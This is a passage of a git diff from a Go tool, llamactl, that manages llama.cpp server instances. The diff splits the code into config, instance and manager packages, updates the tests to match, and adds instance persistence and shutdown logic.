@@ -139,8 +150,8 @@ func TestLoadConfig_EnvironmentOverrides(t *testing.T) {
|
||||
if cfg.Instances.PortRange != [2]int{5000, 6000} {
|
||||
t.Errorf("Expected port range [5000, 6000], got %v", cfg.Instances.PortRange)
|
||||
}
|
||||
if cfg.Instances.LogDirectory != "/env/logs" {
|
||||
t.Errorf("Expected log directory '/env/logs', got %q", cfg.Instances.LogDirectory)
|
||||
if cfg.Instances.LogsDir != "/env/logs" {
|
||||
t.Errorf("Expected logs directory '/env/logs', got %q", cfg.Instances.LogsDir)
|
||||
}
|
||||
if cfg.Instances.MaxInstances != 20 {
|
||||
t.Errorf("Expected max instances 20, got %d", cfg.Instances.MaxInstances)
|
||||
@@ -183,7 +194,7 @@ instances:
|
||||
defer os.Unsetenv("LLAMACTL_HOST")
|
||||
defer os.Unsetenv("LLAMACTL_MAX_INSTANCES")
|
||||
|
||||
cfg, err := llamactl.LoadConfig(configFile)
|
||||
cfg, err := config.LoadConfig(configFile)
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
@@ -219,7 +230,7 @@ instances:
|
||||
t.Fatalf("Failed to write test config file: %v", err)
|
||||
}
|
||||
|
||||
_, err = llamactl.LoadConfig(configFile)
|
||||
_, err = config.LoadConfig(configFile)
|
||||
if err == nil {
|
||||
t.Error("Expected LoadConfig to return error for invalid YAML")
|
||||
}
|
||||
@@ -245,7 +256,7 @@ func TestParsePortRange(t *testing.T) {
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := llamactl.ParsePortRange(tt.input)
|
||||
result := config.ParsePortRange(tt.input)
|
||||
if result != tt.expected {
|
||||
t.Errorf("ParsePortRange(%q) = %v, expected %v", tt.input, result, tt.expected)
|
||||
}
|
||||
@@ -260,31 +271,31 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
|
||||
testCases := []struct {
|
||||
envVar string
|
||||
envValue string
|
||||
checkFn func(*llamactl.Config) bool
|
||||
checkFn func(*config.AppConfig) bool
|
||||
desc string
|
||||
}{
|
||||
{
|
||||
envVar: "LLAMACTL_PORT",
|
||||
envValue: "invalid-port",
|
||||
checkFn: func(c *llamactl.Config) bool { return c.Server.Port == 8080 }, // Should keep default
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Server.Port == 8080 }, // Should keep default
|
||||
desc: "invalid port number should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_MAX_INSTANCES",
|
||||
envValue: "not-a-number",
|
||||
checkFn: func(c *llamactl.Config) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.MaxInstances == -1 }, // Should keep default
|
||||
desc: "invalid max instances should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_DEFAULT_AUTO_RESTART",
|
||||
envValue: "invalid-bool",
|
||||
checkFn: func(c *llamactl.Config) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.DefaultAutoRestart == true }, // Should keep default
|
||||
desc: "invalid boolean should keep default",
|
||||
},
|
||||
{
|
||||
envVar: "LLAMACTL_INSTANCE_PORT_RANGE",
|
||||
envValue: "invalid-range",
|
||||
checkFn: func(c *llamactl.Config) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
|
||||
checkFn: func(c *config.AppConfig) bool { return c.Instances.PortRange == [2]int{8000, 9000} }, // Should keep default
|
||||
desc: "invalid port range should keep default",
|
||||
},
|
||||
}
|
||||
@@ -294,7 +305,7 @@ func TestLoadConfig_EnvironmentVariableTypes(t *testing.T) {
|
||||
os.Setenv(tc.envVar, tc.envValue)
|
||||
defer os.Unsetenv(tc.envVar)
|
||||
|
||||
cfg, err := llamactl.LoadConfig("nonexistent-file.yaml")
|
||||
cfg, err := config.LoadConfig("nonexistent-file.yaml")
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
@@ -323,7 +334,7 @@ server:
|
||||
t.Fatalf("Failed to write test config file: %v", err)
|
||||
}
|
||||
|
||||
cfg, err := llamactl.LoadConfig(configFile)
|
||||
cfg, err := config.LoadConfig(configFile)
|
||||
if err != nil {
|
||||
t.Fatalf("LoadConfig failed: %v", err)
|
||||
}
|
||||
@@ -1,10 +1,12 @@
|
||||
package llamactl
|
||||
package instance
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"io"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/config"
|
||||
"log"
|
||||
"net/http"
|
||||
"net/http/httputil"
|
||||
@@ -21,7 +23,7 @@ type CreateInstanceOptions struct {
|
||||
// RestartDelay duration in seconds
|
||||
RestartDelay *int `json:"restart_delay_seconds,omitempty"`
|
||||
|
||||
LlamaServerOptions `json:",inline"`
|
||||
llamacpp.LlamaServerOptions `json:",inline"`
|
||||
}
|
||||
|
||||
// UnmarshalJSON implements custom JSON unmarshaling for CreateInstanceOptions
|
||||
@@ -53,11 +55,11 @@ func (c *CreateInstanceOptions) UnmarshalJSON(data []byte) error {
|
||||
return nil
|
||||
}
|
||||
|
||||
// Instance represents a running instance of the llama server
|
||||
type Instance struct {
|
||||
// Process represents a running instance of the llama server
|
||||
type Process struct {
|
||||
Name string `json:"name"`
|
||||
options *CreateInstanceOptions `json:"-"`
|
||||
globalSettings *InstancesConfig
|
||||
globalSettings *config.InstancesConfig
|
||||
|
||||
// Status
|
||||
Running bool `json:"running"`
|
||||
@@ -121,7 +123,7 @@ func validateAndCopyOptions(name string, options *CreateInstanceOptions) *Create
|
||||
}
|
||||
|
||||
// applyDefaultOptions applies default values from global settings to any nil options
|
||||
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *InstancesConfig) {
|
||||
func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *config.InstancesConfig) {
|
||||
if globalSettings == nil {
|
||||
return
|
||||
}
|
||||
@@ -143,15 +145,15 @@ func applyDefaultOptions(options *CreateInstanceOptions, globalSettings *Instanc
|
||||
}
|
||||
|
||||
// NewInstance creates a new instance with the given name, log path, and options
|
||||
func NewInstance(name string, globalSettings *InstancesConfig, options *CreateInstanceOptions) *Instance {
|
||||
func NewInstance(name string, globalSettings *config.InstancesConfig, options *CreateInstanceOptions) *Process {
|
||||
// Validate and copy options
|
||||
optionsCopy := validateAndCopyOptions(name, options)
|
||||
// Apply defaults
|
||||
applyDefaultOptions(optionsCopy, globalSettings)
|
||||
// Create the instance logger
|
||||
logger := NewInstanceLogger(name, globalSettings.LogDirectory)
|
||||
logger := NewInstanceLogger(name, globalSettings.LogsDir)
|
||||
|
||||
return &Instance{
|
||||
return &Process{
|
||||
Name: name,
|
||||
options: optionsCopy,
|
||||
globalSettings: globalSettings,
|
||||
@@ -163,13 +165,13 @@ func NewInstance(name string, globalSettings *InstancesConfig, options *CreateIn
|
||||
}
|
||||
}
|
||||
|
||||
func (i *Instance) GetOptions() *CreateInstanceOptions {
|
||||
func (i *Process) GetOptions() *CreateInstanceOptions {
|
||||
i.mu.RLock()
|
||||
defer i.mu.RUnlock()
|
||||
return i.options
|
||||
}
|
||||
|
||||
func (i *Instance) SetOptions(options *CreateInstanceOptions) {
|
||||
func (i *Process) SetOptions(options *CreateInstanceOptions) {
|
||||
i.mu.Lock()
|
||||
defer i.mu.Unlock()
|
||||
|
||||
@@ -188,7 +190,7 @@ func (i *Instance) SetOptions(options *CreateInstanceOptions) {
|
||||
}
|
||||
|
||||
// GetProxy returns the reverse proxy for this instance, creating it if needed
|
||||
func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
|
||||
func (i *Process) GetProxy() (*httputil.ReverseProxy, error) {
|
||||
i.mu.Lock()
|
||||
defer i.mu.Unlock()
|
||||
|
||||
@@ -225,7 +227,7 @@ func (i *Instance) GetProxy() (*httputil.ReverseProxy, error) {
|
||||
}
|
||||
|
||||
// MarshalJSON implements json.Marshaler for Instance
|
||||
func (i *Instance) MarshalJSON() ([]byte, error) {
|
||||
func (i *Process) MarshalJSON() ([]byte, error) {
|
||||
// Use read lock since we're only reading data
|
||||
i.mu.RLock()
|
||||
defer i.mu.RUnlock()
|
||||
@@ -235,22 +237,25 @@ func (i *Instance) MarshalJSON() ([]byte, error) {
|
||||
Name string `json:"name"`
|
||||
Options *CreateInstanceOptions `json:"options,omitempty"`
|
||||
Running bool `json:"running"`
|
||||
Created int64 `json:"created,omitempty"`
|
||||
}{
|
||||
Name: i.Name,
|
||||
Options: i.options,
|
||||
Running: i.Running,
|
||||
Created: i.Created,
|
||||
}
|
||||
|
||||
return json.Marshal(temp)
|
||||
}
|
||||
|
||||
// UnmarshalJSON implements json.Unmarshaler for Instance
|
||||
func (i *Instance) UnmarshalJSON(data []byte) error {
|
||||
func (i *Process) UnmarshalJSON(data []byte) error {
|
||||
// Create a temporary struct for unmarshalling
|
||||
temp := struct {
|
||||
Name string `json:"name"`
|
||||
Options *CreateInstanceOptions `json:"options,omitempty"`
|
||||
Running bool `json:"running"`
|
||||
Created int64 `json:"created,omitempty"`
|
||||
}{}
|
||||
|
||||
if err := json.Unmarshal(data, &temp); err != nil {
|
||||
@@ -260,6 +265,7 @@ func (i *Instance) UnmarshalJSON(data []byte) error {
|
||||
// Set the fields
|
||||
i.Name = temp.Name
|
||||
i.Running = temp.Running
|
||||
i.Created = temp.Created
|
||||
|
||||
// Handle options with validation but no defaults
|
||||
if temp.Options != nil {
|
||||
@@ -1,28 +1,30 @@
|
||||
package llamactl_test
|
||||
package instance_test
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"llamactl/pkg/backends/llamacpp"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"llamactl/pkg/testutil"
|
||||
"testing"
|
||||
|
||||
llamactl "llamactl/pkg"
|
||||
)
|
||||
|
||||
func TestNewInstance(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||
|
||||
if instance.Name != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
|
||||
@@ -53,8 +55,8 @@ func TestNewInstance(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestNewInstance_WithRestartOptions(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
@@ -65,16 +67,16 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
|
||||
maxRestarts := 10
|
||||
restartDelay := 15
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
AutoRestart: &autoRestart,
|
||||
MaxRestarts: &maxRestarts,
|
||||
RestartDelay: &restartDelay,
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||
opts := instance.GetOptions()
|
||||
|
||||
// Check that explicit values override defaults
|
||||
@@ -90,8 +92,8 @@ func TestNewInstance_WithRestartOptions(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestNewInstance_ValidationAndDefaults(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
@@ -101,15 +103,15 @@ func TestNewInstance_ValidationAndDefaults(t *testing.T) {
|
||||
invalidMaxRestarts := -5
|
||||
invalidRestartDelay := -10
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
MaxRestarts: &invalidMaxRestarts,
|
||||
RestartDelay: &invalidRestartDelay,
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||
opts := instance.GetOptions()
|
||||
|
||||
// Check that negative values were corrected to 0
|
||||
@@ -122,32 +124,32 @@ func TestNewInstance_ValidationAndDefaults(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestSetOptions(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
initialOptions := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
initialOptions := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, initialOptions)
|
||||
inst := instance.NewInstance("test-instance", globalSettings, initialOptions)
|
||||
|
||||
// Update options
|
||||
newOptions := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
newOptions := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/new-model.gguf",
|
||||
Port: 8081,
|
||||
},
|
||||
}
|
||||
|
||||
instance.SetOptions(newOptions)
|
||||
opts := instance.GetOptions()
|
||||
inst.SetOptions(newOptions)
|
||||
opts := inst.GetOptions()
|
||||
|
||||
if opts.Model != "/path/to/new-model.gguf" {
|
||||
t.Errorf("Expected updated model '/path/to/new-model.gguf', got %q", opts.Model)
|
||||
@@ -163,20 +165,20 @@ func TestSetOptions(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestSetOptions_NilOptions(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||
originalOptions := instance.GetOptions()
|
||||
|
||||
// Try to set nil options
|
||||
@@ -190,21 +192,21 @@ func TestSetOptions_NilOptions(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestGetProxy(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
}
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Host: "localhost",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
inst := instance.NewInstance("test-instance", globalSettings, options)
|
||||
|
||||
// Get proxy for the first time
|
||||
proxy1, err := instance.GetProxy()
|
||||
proxy1, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
t.Fatalf("GetProxy failed: %v", err)
|
||||
}
|
||||
@@ -213,7 +215,7 @@ func TestGetProxy(t *testing.T) {
|
||||
}
|
||||
|
||||
// Get proxy again - should return cached version
|
||||
proxy2, err := instance.GetProxy()
|
||||
proxy2, err := inst.GetProxy()
|
||||
if err != nil {
|
||||
t.Fatalf("GetProxy failed: %v", err)
|
||||
}
|
||||
@@ -223,21 +225,21 @@ func TestGetProxy(t *testing.T) {
|
||||
}
|
||||
|
||||
func TestMarshalJSON(t *testing.T) {
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
DefaultAutoRestart: true,
|
||||
DefaultMaxRestarts: 3,
|
||||
DefaultRestartDelay: 5,
|
||||
}
|
||||
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
Port: 8080,
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test-instance", globalSettings, options)
|
||||
instance := instance.NewInstance("test-instance", globalSettings, options)
|
||||
|
||||
data, err := json.Marshal(instance)
|
||||
if err != nil {
|
||||
@@ -284,20 +286,20 @@ func TestUnmarshalJSON(t *testing.T) {
|
||||
}
|
||||
}`
|
||||
|
||||
var instance llamactl.Instance
|
||||
err := json.Unmarshal([]byte(jsonData), &instance)
|
||||
var inst instance.Process
|
||||
err := json.Unmarshal([]byte(jsonData), &inst)
|
||||
if err != nil {
|
||||
t.Fatalf("JSON unmarshal failed: %v", err)
|
||||
}
|
||||
|
||||
if instance.Name != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
|
||||
if inst.Name != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
|
||||
}
|
||||
if !instance.Running {
|
||||
if !inst.Running {
|
||||
t.Error("Expected running to be true")
|
||||
}
|
||||
|
||||
opts := instance.GetOptions()
|
||||
opts := inst.GetOptions()
|
||||
if opts == nil {
|
||||
t.Fatal("Expected options to be set")
|
||||
}
|
||||
@@ -324,13 +326,13 @@ func TestUnmarshalJSON_PartialOptions(t *testing.T) {
|
||||
}
|
||||
}`
|
||||
|
||||
var instance llamactl.Instance
|
||||
err := json.Unmarshal([]byte(jsonData), &instance)
|
||||
var inst instance.Process
|
||||
err := json.Unmarshal([]byte(jsonData), &inst)
|
||||
if err != nil {
|
||||
t.Fatalf("JSON unmarshal failed: %v", err)
|
||||
}
|
||||
|
||||
opts := instance.GetOptions()
|
||||
opts := inst.GetOptions()
|
||||
if opts.Model != "/path/to/model.gguf" {
|
||||
t.Errorf("Expected model '/path/to/model.gguf', got %q", opts.Model)
|
||||
}
|
||||
@@ -348,20 +350,20 @@ func TestUnmarshalJSON_NoOptions(t *testing.T) {
|
||||
"running": false
|
||||
}`
|
||||
|
||||
var instance llamactl.Instance
|
||||
err := json.Unmarshal([]byte(jsonData), &instance)
|
||||
var inst instance.Process
|
||||
err := json.Unmarshal([]byte(jsonData), &inst)
|
||||
if err != nil {
|
||||
t.Fatalf("JSON unmarshal failed: %v", err)
|
||||
}
|
||||
|
||||
if instance.Name != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %q", instance.Name)
|
||||
if inst.Name != "test-instance" {
|
||||
t.Errorf("Expected name 'test-instance', got %q", inst.Name)
|
||||
}
|
||||
if instance.Running {
|
||||
if inst.Running {
|
||||
t.Error("Expected running to be false")
|
||||
}
|
||||
|
||||
opts := instance.GetOptions()
|
||||
opts := inst.GetOptions()
|
||||
if opts != nil {
|
||||
t.Error("Expected options to be nil when not provided in JSON")
|
||||
}
|
||||
@@ -384,42 +386,42 @@ func TestCreateInstanceOptionsValidation(t *testing.T) {
|
||||
},
|
||||
{
|
||||
name: "valid positive values",
|
||||
maxRestarts: intPtr(10),
|
||||
restartDelay: intPtr(30),
|
||||
maxRestarts: testutil.IntPtr(10),
|
||||
restartDelay: testutil.IntPtr(30),
|
||||
expectedMax: 10,
|
||||
expectedDelay: 30,
|
||||
},
|
||||
{
|
||||
name: "zero values",
|
||||
maxRestarts: intPtr(0),
|
||||
restartDelay: intPtr(0),
|
||||
maxRestarts: testutil.IntPtr(0),
|
||||
restartDelay: testutil.IntPtr(0),
|
||||
expectedMax: 0,
|
||||
expectedDelay: 0,
|
||||
},
|
||||
{
|
||||
name: "negative values should be corrected",
|
||||
maxRestarts: intPtr(-5),
|
||||
restartDelay: intPtr(-10),
|
||||
maxRestarts: testutil.IntPtr(-5),
|
||||
restartDelay: testutil.IntPtr(-10),
|
||||
expectedMax: 0,
|
||||
expectedDelay: 0,
|
||||
},
|
||||
}
|
||||
|
||||
globalSettings := &llamactl.InstancesConfig{
|
||||
LogDirectory: "/tmp/test",
|
||||
globalSettings := &config.InstancesConfig{
|
||||
LogsDir: "/tmp/test",
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
options := &llamactl.CreateInstanceOptions{
|
||||
options := &instance.CreateInstanceOptions{
|
||||
MaxRestarts: tt.maxRestarts,
|
||||
RestartDelay: tt.restartDelay,
|
||||
LlamaServerOptions: llamactl.LlamaServerOptions{
|
||||
LlamaServerOptions: llamacpp.LlamaServerOptions{
|
||||
Model: "/path/to/model.gguf",
|
||||
},
|
||||
}
|
||||
|
||||
instance := llamactl.NewInstance("test", globalSettings, options)
|
||||
instance := instance.NewInstance("test", globalSettings, options)
|
||||
opts := instance.GetOptions()
|
||||
|
||||
if tt.maxRestarts != nil {
|
||||
@@ -1,4 +1,4 @@
|
||||
package llamactl
|
||||
package instance
|
||||
|
||||
import (
|
||||
"context"
|
||||
@@ -11,7 +11,7 @@ import (
|
||||
)
|
||||
|
||||
// Start starts the llama server instance and returns an error if it fails.
|
||||
func (i *Instance) Start() error {
|
||||
func (i *Process) Start() error {
|
||||
i.mu.Lock()
|
||||
defer i.mu.Unlock()
|
||||
|
||||
@@ -75,7 +75,7 @@ func (i *Instance) Start() error {
|
||||
}
|
||||
|
||||
// Stop terminates the subprocess
|
||||
func (i *Instance) Stop() error {
|
||||
func (i *Process) Stop() error {
|
||||
i.mu.Lock()
|
||||
|
||||
if !i.Running {
|
||||
@@ -140,7 +140,7 @@ func (i *Instance) Stop() error {
|
||||
return nil
|
||||
}
|
||||
|
||||
func (i *Instance) monitorProcess() {
|
||||
func (i *Process) monitorProcess() {
|
||||
defer func() {
|
||||
i.mu.Lock()
|
||||
if i.monitorDone != nil {
|
||||
@@ -181,7 +181,7 @@ func (i *Instance) monitorProcess() {
|
||||
}
|
||||
|
||||
// handleRestart manages the restart process while holding the lock
|
||||
func (i *Instance) handleRestart() {
|
||||
func (i *Process) handleRestart() {
|
||||
// Validate restart conditions and get safe parameters
|
||||
shouldRestart, maxRestarts, restartDelay := i.validateRestartConditions()
|
||||
if !shouldRestart {
|
||||
@@ -223,7 +223,7 @@ func (i *Instance) handleRestart() {
|
||||
}
|
||||
|
||||
// validateRestartConditions checks if the instance should be restarted and returns the parameters
|
||||
func (i *Instance) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
|
||||
func (i *Process) validateRestartConditions() (shouldRestart bool, maxRestarts int, restartDelay int) {
|
||||
if i.options == nil {
|
||||
log.Printf("Instance %s not restarting: options are nil", i.Name)
|
||||
return false, 0, 0
|
||||
@@ -1,4 +1,4 @@
|
||||
package llamactl
|
||||
package instance
|
||||
|
||||
import (
|
||||
"bufio"
|
||||
@@ -52,7 +52,7 @@ func (i *InstanceLogger) Create() error {
|
||||
}
|
||||
|
||||
// GetLogs retrieves the last n lines of logs from the instance
|
||||
func (i *Instance) GetLogs(num_lines int) (string, error) {
|
||||
func (i *Process) GetLogs(num_lines int) (string, error) {
|
||||
i.mu.RLock()
|
||||
logFileName := i.logger.logFilePath
|
||||
i.mu.RUnlock()
|
||||
@@ -1,6 +1,6 @@
|
||||
//go:build !windows
|
||||
|
||||
package llamactl
|
||||
package instance
|
||||
|
||||
import (
|
||||
"os/exec"
|
||||
@@ -1,6 +1,6 @@
|
||||
//go:build windows
|
||||
|
||||
package llamactl
|
||||
package instance
|
||||
|
||||
import "os/exec"
|
||||
|
||||
222
pkg/manager/manager.go
Normal file
222
pkg/manager/manager.go
Normal file
@@ -0,0 +1,222 @@
|
||||
package manager
|
||||
|
||||
import (
|
||||
"encoding/json"
|
||||
"fmt"
|
||||
"llamactl/pkg/config"
|
||||
"llamactl/pkg/instance"
|
||||
"log"
|
||||
"os"
|
||||
"path/filepath"
|
||||
"strings"
|
||||
"sync"
|
||||
)
|
||||
|
||||
// InstanceManager defines the interface for managing instances of the llama server.
|
||||
type InstanceManager interface {
|
||||
ListInstances() ([]*instance.Process, error)
|
||||
CreateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
|
||||
GetInstance(name string) (*instance.Process, error)
|
||||
UpdateInstance(name string, options *instance.CreateInstanceOptions) (*instance.Process, error)
|
||||
DeleteInstance(name string) error
|
||||
StartInstance(name string) (*instance.Process, error)
|
||||
StopInstance(name string) (*instance.Process, error)
|
||||
RestartInstance(name string) (*instance.Process, error)
|
||||
GetInstanceLogs(name string) (string, error)
|
||||
Shutdown()
|
||||
}
|
||||
|
||||
type instanceManager struct {
|
||||
mu sync.RWMutex
|
||||
instances map[string]*instance.Process
|
||||
ports map[int]bool
|
||||
instancesConfig config.InstancesConfig
|
||||
}
|
||||
|
||||
// NewInstanceManager creates a new instance of InstanceManager.
|
||||
func NewInstanceManager(instancesConfig config.InstancesConfig) InstanceManager {
|
||||
im := &instanceManager{
|
||||
instances: make(map[string]*instance.Process),
|
||||
ports: make(map[int]bool),
|
||||
instancesConfig: instancesConfig,
|
||||
}
|
||||
|
||||
// Load existing instances from disk
|
||||
if err := im.loadInstances(); err != nil {
|
||||
log.Printf("Error loading instances: %v", err)
|
||||
}
|
||||
return im
|
||||
}
|
||||
|
||||
func (im *instanceManager) getNextAvailablePort() (int, error) {
|
||||
portRange := im.instancesConfig.PortRange
|
||||
|
||||
for port := portRange[0]; port <= portRange[1]; port++ {
|
||||
if !im.ports[port] {
|
||||
im.ports[port] = true
|
||||
return port, nil
|
||||
}
|
||||
}
|
||||
|
||||
return 0, fmt.Errorf("no available ports in the specified range")
|
||||
}
|
||||
|
||||
// persistInstance saves an instance to its JSON file
|
||||
func (im *instanceManager) persistInstance(instance *instance.Process) error {
|
||||
if im.instancesConfig.InstancesDir == "" {
|
||||
return nil // Persistence disabled
|
||||
}
|
||||
|
||||
instancePath := filepath.Join(im.instancesConfig.InstancesDir, instance.Name+".json")
|
||||
tempPath := instancePath + ".tmp"
|
||||
|
||||
// Serialize instance to JSON
|
||||
jsonData, err := json.MarshalIndent(instance, "", " ")
|
||||
if err != nil {
|
||||
return fmt.Errorf("failed to marshal instance %s: %w", instance.Name, err)
|
||||
}
|
||||
|
||||
// Write to temporary file first
|
||||
if err := os.WriteFile(tempPath, jsonData, 0644); err != nil {
|
||||
return fmt.Errorf("failed to write temp file for instance %s: %w", instance.Name, err)
|
||||
}
|
||||
|
||||
// Atomic rename
|
||||
if err := os.Rename(tempPath, instancePath); err != nil {
|
||||
os.Remove(tempPath) // Clean up temp file
|
||||
return fmt.Errorf("failed to rename temp file for instance %s: %w", instance.Name, err)
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
func (im *instanceManager) Shutdown() {
|
||||
im.mu.Lock()
|
||||
defer im.mu.Unlock()
|
||||
|
||||
var wg sync.WaitGroup
|
||||
wg.Add(len(im.instances))
|
||||
|
||||
for name, inst := range im.instances {
|
||||
if !inst.Running {
|
||||
wg.Done() // If instance is not running, just mark it as done
|
||||
continue
|
||||
}
|
||||
|
||||
go func(name string, inst *instance.Process) {
|
||||
defer wg.Done()
|
||||
fmt.Printf("Stopping instance %s...\n", name)
|
||||
// Attempt to stop the instance gracefully
|
||||
if err := inst.Stop(); err != nil {
|
||||
fmt.Printf("Error stopping instance %s: %v\n", name, err)
|
||||
}
|
||||
}(name, inst)
|
||||
}
|
||||
|
||||
wg.Wait()
|
||||
fmt.Println("All instances stopped.")
|
||||
}
|
||||
|
||||
// loadInstances restores all instances from disk
|
||||
func (im *instanceManager) loadInstances() error {
|
||||
if im.instancesConfig.InstancesDir == "" {
|
||||
return nil // Persistence disabled
|
||||
}
|
||||
|
||||
// Check if instances directory exists
|
||||
if _, err := os.Stat(im.instancesConfig.InstancesDir); os.IsNotExist(err) {
|
||||
